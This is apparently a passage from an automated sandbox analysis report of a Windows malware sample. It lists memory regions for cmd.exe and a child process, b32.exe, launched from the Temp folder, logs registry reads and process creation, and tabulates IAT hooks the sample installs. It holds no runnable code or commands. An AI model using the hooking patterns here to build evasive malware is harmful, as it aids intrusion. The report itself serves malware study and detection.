pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000070000 0x00070000 0x00071fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x00090fff Private Memory Readable, Writable True False False -
private_0x00000000000a0000 0x000a0000 0x0011ffff Private Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x0016ffff Private Memory Readable, Writable True False False -
private_0x00000000001a0000 0x001a0000 0x0029ffff Private Memory Readable, Writable True False False -
private_0x00000000002f0000 0x002f0000 0x003effff Private Memory Readable, Writable True False False -
locale.nls 0x003f0000 0x00456fff Memory Mapped File Readable False False False -
pagefile_0x0000000000460000 0x00460000 0x005e7fff Pagefile Backed Memory Readable True False False -
private_0x0000000000650000 0x00650000 0x0065ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000660000 0x00660000 0x007e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000007f0000 0x007f0000 0x01beffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001bf0000 0x01bf0000 0x01f32fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01f40000 0x0220efff Memory Mapped File Readable False False False -
cmd.exe 0x4a9a0000 0x4a9ebfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
winbrand.dll 0x75430000 0x75436fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0xabc
56 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-05-11 13:20:41 (UTC) True 1
Fn
System Get Time type = Ticks, time = 104380 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a9a0000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x75ffa84f True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 3
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
Environment Get Environment String - True 2
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module Get Filename process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Environment Get Environment String name = KEYS False 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp, type = file_attributes True 2
Fn
Environment Set Environment String name = =C:, value = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x76003b92 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75fe4a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x75ffa79d True 1
Fn
File Get Info filename = b32.exe, type = file_attributes True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Process Create process_name = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, os_pid = 0xad4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Environment Set Environment String name = COPYCMD True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCodeAscii True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
Process #6: b32.exe
9868 35
»
Information Value
ID #6
File Name c:\users\5p5nrg~1\appdata\local\temp\b32.exe
Command Line b32.exe
Initial Working Directory C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor Start Time: 00:00:41, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:01:43
OS Process Information
»
Information Value
PID 0xad4
Parent PID 0xab8 (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x AD8
0x AEC
0x AFC
0x B1C
0x B20
0x B24
0x B28
0x B2C
0x B30
0x B34
0x B38
0x B3C
0x B40
0x BB0
0x 808
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000050000 0x00050000 0x00050fff Private Memory Readable, Writable True False False -
private_0x0000000000050000 0x00050000 0x0005ffff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x00060fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000060000 0x00060000 0x00067fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000070000 0x00070000 0x00070fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000070000 0x00070000 0x00070fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x000cffff Private Memory Readable, Writable True False False -
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory Readable, Writable True False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True False False -
private_0x0000000000120000 0x00120000 0x00120fff Private Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x00130fff Private Memory Readable, Writable True False False -
private_0x0000000000140000 0x00140000 0x00140fff Private Memory Readable, Writable True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable True False False -
private_0x0000000000160000 0x00160000 0x00160fff Private Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x0017ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000170000 0x00170000 0x00177fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x00170fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000180000 0x00180000 0x00187fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000180000 0x00180000 0x00181fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
pagefile_0x0000000000210000 0x00210000 0x00211fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000210000 0x00210000 0x00216fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000220000 0x00220000 0x00221fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000230000 0x00230000 0x002affff Private Memory Readable, Writable True False False -
private_0x00000000002b0000 0x002b0000 0x002d6fff Private Memory Readable, Writable True False False -
msctf.dll.mui 0x002b0000 0x002b0fff Memory Mapped File Readable, Writable False False False -
pagefile_0x00000000002c0000 0x002c0000 0x002c1fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000002c0000 0x002c0000 0x002c0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000002d0000 0x002d0000 0x002d0fff Pagefile Backed Memory Readable True False False -
private_0x00000000002e0000 0x002e0000 0x002effff Private Memory Readable, Writable True False False -
pagefile_0x00000000002f0000 0x002f0000 0x003cefff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000003d0000 0x003d0000 0x003d1fff Pagefile Backed Memory Readable True False False -
private_0x00000000003d0000 0x003d0000 0x003e6fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True False False -
b32.exe 0x00400000 0x0a9bafff Memory Mapped File Readable, Writable, Executable True False False -
private_0x000000000a9c0000 0x0a9c0000 0x0a9fffff Private Memory Readable, Writable True False False -
private_0x000000000aa00000 0x0aa00000 0x0aa3ffff Private Memory Readable, Writable True False False -
rsaenh.dll 0x0aa00000 0x0aa3bfff Memory Mapped File Readable False False False -
private_0x000000000aa00000 0x0aa00000 0x0aa00fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x000000000aa00000 0x0aa00000 0x0aa4ffff Pagefile Backed Memory Readable, Writable True False False -
windowsshell.manifest 0x0aa00000 0x0aa00fff Memory Mapped File Readable False False False -
index.dat 0x0aa00000 0x0aa0ffff Memory Mapped File Readable, Writable True False False -
pagefile_0x000000000aa10000 0x0aa10000 0x0aa11fff Pagefile Backed Memory Readable True False False -
index.dat 0x0aa20000 0x0aa27fff Memory Mapped File Readable, Writable True False False -
index.dat 0x0aa30000 0x0aa3ffff Memory Mapped File Readable, Writable True False False -
private_0x000000000aa40000 0x0aa40000 0x0aa42fff Private Memory Readable, Writable, Executable True False False -
private_0x000000000aa50000 0x0aa50000 0x0ab4ffff Private Memory Readable, Writable True False False -
pagefile_0x000000000ab50000 0x0ab50000 0x0acd7fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000ace0000 0x0ace0000 0x0ae60fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000ae70000 0x0ae70000 0x0c26ffff Pagefile Backed Memory Readable True False False -
private_0x000000000c270000 0x0c270000 0x0c3affff Private Memory Readable, Writable True False False -
private_0x000000000c270000 0x0c270000 0x0c36ffff Private Memory Readable, Writable True False False -
private_0x000000000c370000 0x0c370000 0x0c3affff Private Memory Readable, Writable True False False -
private_0x000000000c3b0000 0x0c3b0000 0x0c56ffff Private Memory Readable, Writable True False False -
private_0x000000000c3b0000 0x0c3b0000 0x0c4affff Private Memory Readable, Writable True False False -
private_0x000000000c4b0000 0x0c4b0000 0x0c52ffff Private Memory Readable, Writable True False False -
private_0x000000000c530000 0x0c530000 0x0c530fff Private Memory Readable, Writable, Executable True False False -
private_0x000000000c530000 0x0c530000 0x0c532fff Private Memory Readable, Writable, Executable True False False -
private_0x000000000c540000 0x0c540000 0x0c540fff Private Memory Readable, Writable True False False -
private_0x000000000c560000 0x0c560000 0x0c56ffff Private Memory Readable, Writable True False False -
private_0x000000000c570000 0x0c570000 0x0c66ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x0c670000 0x0c93efff Memory Mapped File Readable False False False -
pagefile_0x000000000c940000 0x0c940000 0x0cd32fff Pagefile Backed Memory Readable True False False -
private_0x000000000cd40000 0x0cd40000 0x0cddffff Private Memory Readable, Writable True False False -
private_0x000000000cd40000 0x0cd40000 0x0cd7ffff Private Memory Readable, Writable True False False -
private_0x000000000cda0000 0x0cda0000 0x0cddffff Private Memory Readable, Writable True False False -
private_0x000000000cde0000 0x0cde0000 0x0ce4ffff Private Memory Readable, Writable True False False -
private_0x000000000ce50000 0x0ce50000 0x0cf4ffff Private Memory Readable, Writable True False False -
private_0x000000000cf50000 0x0cf50000 0x0cf8ffff Private Memory Readable, Writable True False False -
private_0x000000000cf90000 0x0cf90000 0x0d08ffff Private Memory Readable, Writable True False False -
private_0x000000000d090000 0x0d090000 0x0d0cffff Private Memory Readable, Writable True False False -
private_0x000000000d0d0000 0x0d0d0000 0x0d1cffff Private Memory Readable, Writable True False False -
private_0x000000000d1d0000 0x0d1d0000 0x0d20ffff Private Memory Readable, Writable True False False -
private_0x000000000d210000 0x0d210000 0x0d30ffff Private Memory Readable, Writable True False False -
private_0x000000000d310000 0x0d310000 0x0d40ffff Private Memory Readable, Writable True False False -
pidor.bmp 0x0e940000 0x0ee31fff Memory Mapped File Readable True True False
msvcr100.dll 0x71060000 0x7111efff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x74f00000 0x74f51fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x74f70000 0x74faafff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74fb0000 0x74fc5fff Memory Mapped File Readable, Writable, Executable False False False -
rtutils.dll 0x74fd0000 0x74fdcfff Memory Mapped File Readable, Writable, Executable False False False -
rasman.dll 0x74fe0000 0x74ff4fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x75040000 0x75046fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x75050000 0x7506bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x75070000 0x750b3fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x750c0000 0x750cafff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x750d0000 0x7526dfff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x752b0000 0x752c2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x752d0000 0x7534ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x75a20000 0x75a24fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75a50000 0x75a55fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x75a60000 0x75b7cfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x75dd0000 0x75fcafff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x76180000 0x761d6fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x76240000 0x76375fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76380000 0x763b4fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x763d0000 0x763dbfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x764e0000 0x7656efff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x76570000 0x76664fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76890000 0x76912fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76920000 0x77569fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x776c0000 0x7781bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
normaliz.dll 0x77e00000 0x77e02fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 176 entries are omitted.
The remaining entries can be found in flog.txt.
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x000000000aa50000:+0x14e7c 3. entry of b32.exe 4 bytes gdi32.dll:SetMapMode+0x0 now points to b32.exe:+0x93b1333
IAT private_0x000000000aa50000:+0x14e7c 6. entry of b32.exe 4 bytes kernel32.dll:GetTapePosition+0x0 now points to private_0x000000007fff0000:+0x4a7e4c1
IAT private_0x000000000aa50000:+0x14e7c 7. entry of b32.exe 4 bytes kernel32.dll:lstrlenW+0x0 now points to private_0x000000007fff0000:+0x1eae77d5
IAT private_0x000000000aa50000:+0x14e7c 8. entry of b32.exe 4 bytes kernel32.dll:LoadLibraryA+0x0 now points to private_0x000000007fff0000:+0x6c5cfa51
IAT private_0x000000000aa50000:+0x14e7c 10. entry of b32.exe 4 bytes kernel32.dll:GetThreadPriority+0x0 now points to private_0x000000007fff0000:+0x1ee40e13
IAT private_0x000000000aa50000:+0x14e7c 13. entry of b32.exe 4 bytes kernel32.dll:CreateFileW+0x0 now points to private_0x000000007fff0000:+0x7a00550e
IAT private_0x000000000aa50000:+0x14e7c 14. entry of b32.exe 4 bytes kernel32.dll:FlushFileBuffers+0x0 now points to b32.exe:+0x345dd80
IAT private_0x000000000aa50000:+0x14e7c 15. entry of b32.exe 4 bytes kernel32.dll:WriteConsoleW+0x0 now points to b32.exe:+0x93f133d
IAT private_0x000000000aa50000:+0x14e7c 17. entry of b32.exe 4 bytes kernel32.dll:OutputDebugStringW+0x0 now points to b32.exe:+0x237212f
IAT private_0x000000000aa50000:+0x14e7c 19. entry of b32.exe 4 bytes kernel32.dll:SetFilePointerEx+0x0 now points to private_0x000000007fff0000:+0x55f87feb
IAT private_0x000000000aa50000:+0x14e7c 21. entry of b32.exe 4 bytes kernel32.dll:lstrlenA+0x0 now points to b32.exe:+0x3d3bc6b
IAT private_0x000000000aa50000:+0x14e7c 22. entry of b32.exe 4 bytes kernel32.dll:WaitForSingleObject+0x0 now points to private_0x000000007fff0000:+0x4495555
IAT private_0x000000000aa50000:+0x14e7c 23. entry of b32.exe 4 bytes kernel32.dll:CloseHandle+0x0 now points to private_0x000000007fff0000:+0x4fe15ce7
IAT private_0x000000000aa50000:+0x14e7c 24. entry of b32.exe 4 bytes kernel32.dll:PulseEvent+0x0 now points to private_0x000000007fff0000:+0x46d9dfc1
IAT private_0x000000000aa50000:+0x14e7c 25. entry of b32.exe 4 bytes kernel32.dll:WideCharToMultiByte+0x0 now points to private_0x000000007fff0000:+0x3ae4985e
IAT private_0x000000000aa50000:+0x14e7c 27. entry of b32.exe 4 bytes ntdll.dll:RtlDecodePointer+0x0 now points to pagefile_0x000000000ae70000:+0x4e97fb
IAT private_0x000000000aa50000:+0x14e7c 28. entry of b32.exe 4 bytes ntdll.dll:RtlEnterCriticalSection+0x0 now points to private_0x000000007fff0000:+0x8555c13
IAT private_0x000000000aa50000:+0x14e7c 33. entry of b32.exe 4 bytes kernel32.dll:GetLastError+0x0 now points to private_0x000000007fff0000:+0x7b97860a
IAT private_0x000000000aa50000:+0x14e7c 38. entry of b32.exe 4 bytes kernel32.dll:RtlUnwind+0x0 now points to private_0x000000007fff0000:+0x64ff9999
IAT private_0x000000000aa50000:+0x14e7c 39. entry of b32.exe 4 bytes ntdll.dll:RtlAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x3c90f0ec
IAT private_0x000000000aa50000:+0x14e7c 40. entry of b32.exe 4 bytes kernel32.dll:IsProcessorFeaturePresent+0x0 now points to private_0x000000007fff0000:+0x6cf3ecd7
IAT private_0x000000000aa50000:+0x14e7c 41. entry of b32.exe 4 bytes kernel32.dll:UnhandledExceptionFilter+0x0 now points to private_0x000000007fff0000:+0x5a90d29f
IAT private_0x000000000aa50000:+0x14e7c 42. entry of b32.exe 4 bytes kernel32.dll:SetUnhandledExceptionFilter+0x0 now points to private_0x000000007fff0000:+0x548b3d7b
IAT private_0x000000000aa50000:+0x14e7c 44. entry of b32.exe 4 bytes kernel32.dll:InitializeCriticalSectionAndSpinCount+0x0 now points to private_0x000000007fff0000:+0x70991b0b
IAT private_0x000000000aa50000:+0x14e7c 45. entry of b32.exe 4 bytes kernel32.dll:Sleep+0x0 now points to b32.exe:+0x1e8e1ba
IAT private_0x000000000aa50000:+0x14e7c 49. entry of b32.exe 4 bytes kernel32.dll:TlsGetValue+0x0 now points to private_0x000000007fff0000:+0x428f1c99
IAT private_0x000000000aa50000:+0x14e7c 50. entry of b32.exe 4 bytes kernel32.dll:TlsSetValue+0x0 now points to private_0x000000007fff0000:+0x3f0ebf67
IAT private_0x000000000aa50000:+0x14e7c 51. entry of b32.exe 4 bytes kernel32.dll:TlsFree+0x0 now points to private_0x000000007fff0000:+0x2d030537
IAT private_0x000000000aa50000:+0x14e7c 54. entry of b32.exe 4 bytes kernel32.dll:GetProcAddress+0x0 now points to private_0x000000007fff0000:+0x14fb7805
IAT private_0x000000000aa50000:+0x14e7c 55. entry of b32.exe 4 bytes kernel32.dll:LCMapStringW+0x0 now points to private_0x000000007fff0000:+0x15680b32
